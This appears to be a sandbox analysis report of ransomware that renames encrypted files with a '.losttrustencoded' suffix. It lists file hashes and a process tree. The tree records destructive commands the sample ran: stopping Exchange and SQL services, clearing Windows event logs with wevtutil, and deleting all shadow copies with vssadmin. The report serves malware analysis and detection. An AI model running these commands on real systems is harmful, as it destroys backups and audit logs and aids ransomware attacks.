C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeAB2⤵PID:1464
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAB3⤵PID:1300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAB4⤵PID:2504
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeAntispamUpdate2⤵PID:2920
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAntispamUpdate3⤵PID:2024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAntispamUpdate4⤵PID:1232
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeEdgeSync2⤵PID:1060
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeEdgeSync3⤵PID:1440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeEdgeSync4⤵PID:1332
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeImap42⤵PID:2988
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeImap43⤵PID:2708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeImap44⤵PID:2936
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeMailboxReplication2⤵PID:2664
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxReplication3⤵PID:2568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxReplication4⤵PID:900
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeProtectedServiceHost2⤵PID:2540
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeProtectedServiceHost3⤵PID:2524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeProtectedServiceHost4⤵PID:1192
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl Application2⤵PID:2660
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl Application3⤵
- Clears Windows event logs
PID:2144
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl security2⤵PID:1916
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl security3⤵
- Clears Windows event logs
PID:3068
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl setup2⤵PID:400
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl setup3⤵
- Clears Windows event logs
PID:2492
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl system2⤵PID:1936
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl system3⤵
- Clears Windows event logs
PID:2688
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet2⤵PID:2596
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE2⤵PID:2592
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE3⤵PID:3024
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE2⤵PID:640
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE3⤵PID:2296
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE2⤵PID:868
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE3⤵PID:2740
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE2⤵PID:1708
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE3⤵PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL STOPSERVIC2⤵PID:2372
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL STOPSERVIC3⤵PID:2828
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL STOPSERVICE2⤵PID:1672
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL STOPSERVICE3⤵PID:2172
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1036
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.losttrustencoded
Filesize27KB
MD5d14aa42e206fac8a74db97000f5252e7
SHA1b32082f2a723dc53e8224eea3111307a2ada03fa
SHA2561c83216d4a563c279b5cb767675da35bd8bb24b6add0bb822a29eb9cbe7d4a90
SHA51234d7e534626df47233f660532cb2b380419614a88fc86f48defce8232c2d7ef715f1c2cb26f81312d285a180013cb3ad900bc228e054776422f20e121a3f805a
-
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_OFF.GIF.losttrustencoded
Filesize597B
MD59576cb48374eb3e358c61a3ed6e65580
SHA1d6c6173de6b3fdd8aa158844922f20799642d0b5
SHA2566e0fd4f95d9e3c1e93a0f54145e251e48a2ac10fa7ab34cb026529c8d5f1ab36
SHA512650017eaced4b2a18bbbffc9a9e87e1d56a7445c743e1754f0f5dbcb6374129debfdd77d4ba8b9d7df86a0e58fb8221ceef7b6e70b264c539c2c80561bf1e382
-
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_ON.GIF.losttrustencoded
Filesize478B
MD5eeb66397f869dae711b26444fe59f34a
SHA12012b7a274ac88dd7b9418fa221054f1aa9996be
SHA2567a1365b2925be6e45319f913f50bcd16fd19baf4f9ce695b3f53d174889dd480
SHA5124c4d55e83b3cf31b40fa8e4b533b5f24e0c81bb15ff3f98566e83e44dbfff023912ed8cf112b9c203c2a81880cb2cd7bdd62decb1104e3b8bb6a9ebcf3e63a99
-
Filesize
370B
MD58c6654a3a4735f7797a5d42655472edb
SHA1ae9dc81d69816ee4eba1e64fb3eeeaa702b0fb3d
SHA256d4e12a87c2b50e1f940b8fe78f0e7198ca095436ff80c5decfa08f076c506902
SHA51238c45c4af34b641c34ea112bca1917028eb3a88f5c88fa37a501789568911d6ccfb6756ec4724b99e4d9d8db474d3b073608c5f7d7a5e9af18a930b4398adc1b
-
Filesize
369B
MD54261ab883b643d4b60ee3af72951e1c8
SHA1ad2b8ecf1fc7c4ea70549a7b186b1a3175e2d8f9
SHA2568b6b660f5fef03e397f47ee703ac746605a6351302198aeb7d8fdb08b387ad44
SHA5120615022820880862d66b2174fda76e93393098dd487f67091b97a3e5fc613e650f0a4da0824f20fdf65b35be24565845f9b938c46bade6140a311fa1fb6a8865
-
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_on.gif.losttrustencoded
Filesize478B
MD59d7e2c86ca54fce6d0d6d430df8ff5c3
SHA124ab5b67cc743b892511110ef90e874faec5ed98
SHA256c9b88c4a5d3e44596b346a80ce542a973addba27640c143ca865e7ba27e04f21
SHA51250d8f51bad5fd69314292269eacfd3272b93e9ea98a71b752c00acba979cbb38556e5217e808beae66a5b95cfb8eda3e6246b6948d39d058eb79c1dc889270a7
-
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\TAB_OFF.GIF.losttrustencoded
Filesize597B
MD5c4d38a5153993cc60b6ebab2990c954f
SHA17494aa1825accd6f85f1b02d6bc305662b7a8d34
SHA256142277b1a1b8975cc0ee0fc496b163764f3ceb58e1f52496835bdbd53daf34a8
SHA5126a43e4737742c59bf98c034aa53ac4e56e0128d329760739b2eb0ac4fa26ffe9c69333d94d91859c6e13ed469846351e15c84084da340375bddc197e0458118e
-
Filesize
1KB
MD584d32f4a966e04bb3a390180aafee3e5
SHA14af0c83f0cd6542b3a54a216289b1c652978b787
SHA256a0d2971ec5747776c380e496e627134394c55ea82d4ac9c5b86b6e2689e132c9
SHA5127456a38df3d8930f8da7b02effdee8a21e8ba60f417865e875c6dcb2a23b1dd322c21105ab0169de151488c49f7cd28b042c8d7fb9014a5800e51dea1e1fc06a
-
Filesize
5KB
MD5ab50293ea51f3b35085cf1e801d9cf8e
SHA16a41a6857f36ef6c592c9074cd0fd020887ba727
SHA2560f31a897e5e2546b4cf4129bd86dd527cf1cc8ac860972a69abc1a412de355fa
SHA51269d9c509923c9197cdc1709f9ce46603a5e2b9795dcd2857d3bb3d8eb68872dfe8023c459b6181e9e462c1564511ba8e3b1ece0e56cc3a4385335d39daf2c0e7
-
Filesize
409B
MD568f5037442783548bdc814f79301302f
SHA1febb9eb1a9e58d9e7a13b9042f7d341026ead96a
SHA2561b63f70080bd3c81586b6d291fa64ca9949f4bbb819572ef49e9742b292168aa
SHA5128cedb8c9592c7941632af940a8ad9899ccde29fa51ca0fd8d45ac8d4a391b422a8fcf99c444acf5879a34d71c5b1551afed44cdfff13f974d70c3ef940f7ffc1
-
Filesize
283B
MD5c698751c6bde5c22764ef58f063e8710
SHA1ec41eba2cf0932a0ac984a049b6895643e72ceb1
SHA25642cabb27bc9d913f99acca78c259ca594aad8ae0b9f31d852971b999b7a800f1
SHA5122454542a904b13fddf11e9306b025bb8e3a1550ebb9bbdf4dbb58e5d160d5ff3f5c84c5de4ce4e6919af7a260435d68484c89a0785e1d3dd2ddd40da610cf1ab
-
Filesize
283B
MD5888886cd818bbc67e3c276f940089431
SHA10466f0d5d5785c0af4ec7455e678067be8fb87fa
SHA25664a49272576fc13dc05b3d3e41b91de476a4734d004bdab481e746ee314c09de
SHA5122022a9a5f3b5e5218253597030c505356ad6dd8ad0f900e846a8c8e52450d048614528d7cc4d5f86cf3647471516c37b9e2446679f434a95fece28398a8edd60
-
Filesize
283B
MD50a1d1ae9708c128bfbcae713903457d8
SHA1b6c13c078cf8189c68590043ac4cb37bfc1055c4
SHA256d40091b5493f283aebf091ac4bdfb36f8d3cec238e0e76e4bcadcfa60f5fcb92
SHA51233f93a39aef33fda3a8b87e8c6ebec51b708cd3709b93feb5e4e16be1ee23fad014cb7b4fc999fc7004a9bdec6292fec9aeb9d6852781ff00827108fbb3383f3
-
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.losttrustencoded
Filesize12KB
MD534d62455cdd9ad35d763659bb21d2900
SHA136a9bf7a786129c16fce4f2f17f0aed881a9470d
SHA2565c4ca0c54c83cab93e9a69325163a8377b6f249542fd156b3cee90564a37bea5
SHA512666bde2017bdd0c589f8b58550c1c3b750c4a2ced0a697366080f3e22b4b32f597c8716c0c452809670334e13a32771f302eb19f005a5c4c7b43a011f4563042
-
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html.losttrustencoded
Filesize9KB
MD5a2dceb0929eab4eb4f31fb5f6f7d4add
SHA1049f1cb478b1617e599d6bf8b0a8b38d9a3e69b5
SHA2565e92f27083be265bd76be57b019550f797b55248be207c4b77701ff9155810fd
SHA51280bb502d6b60bb932ede05442a658165eba11a0c39f44f3a864b80dce6d8a17e5ac452cf30d281d97dc71011ff4a93ba4845cc0a4fc2f08a98b0fca88a23ee7e
-
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.losttrustencoded
Filesize7KB
MD540eee0371c1150cae3f261f5a2549048
SHA10ecea6407cd242f56fc992d87ed8c5d94a31c40b
SHA2561d1613b264c15afb770e79f50728f62096505193179ef7a609adb733fd5fd574
SHA512b5ee962679b4db37de547e5b0a0988b99922126b94262af1f607d3fc47ac9cf588e5f1d46c2098373fbd632a41e93968c23a19a1c8047fe983ee20b7007e8f40
-
Filesize
283B
MD530e50d402f2a9969d434304aa2a70253
SHA110b00f866756b2a8890cce442c278b9a36894321
SHA2567fb1ea5fc6be1e5cb24fcffa6c6d1105cd367f47385ebcfc3b7dc5b32b1f1278
SHA512a64fb98d859ccf815d4091f98fc6c5eb2b71c9d59e06e3aa6e377a62cc7c01876fc53956e8a3b0ed3d3cfd86f684f1d1ae2c5920dccc9c0e06a44909170269da
-
Filesize
608KB
MD5c141b2ac26c5f90c0f294bdc09ddaa98
SHA1dce73f900c35682402a4d4996ddab59830ba3b61
SHA25607be1be72fd530a43bb2dc4c16401a6527081f8a67bd83aaffbbac63e81cd9a7
SHA5127312cda91a46cd5f30cc164c29d80511d93e3f9e7c97b56fc766da214d07210135cf00f0962d8bc5914ac88be945dd955d8d53938f6abf399cc4a0fcd7c2f859
-
Filesize
3KB
MD5d2e1713d4eb25a7d99db8d5562abff20
SHA1cffc422db053f4d3e365ea8349c65a2a64f8a086
SHA25603bd58013d50f3edb0a3d60dab984ab194bb8e826dd2dea419ef4c57965de9b6
SHA512537b53ce6f030dcb5292c7dd5958e0b5945ff446af209d83098adb007ca196ba18642d1169994302c85a5ad8f47008f57fb57e764095c79e9c1e023b0120c9bd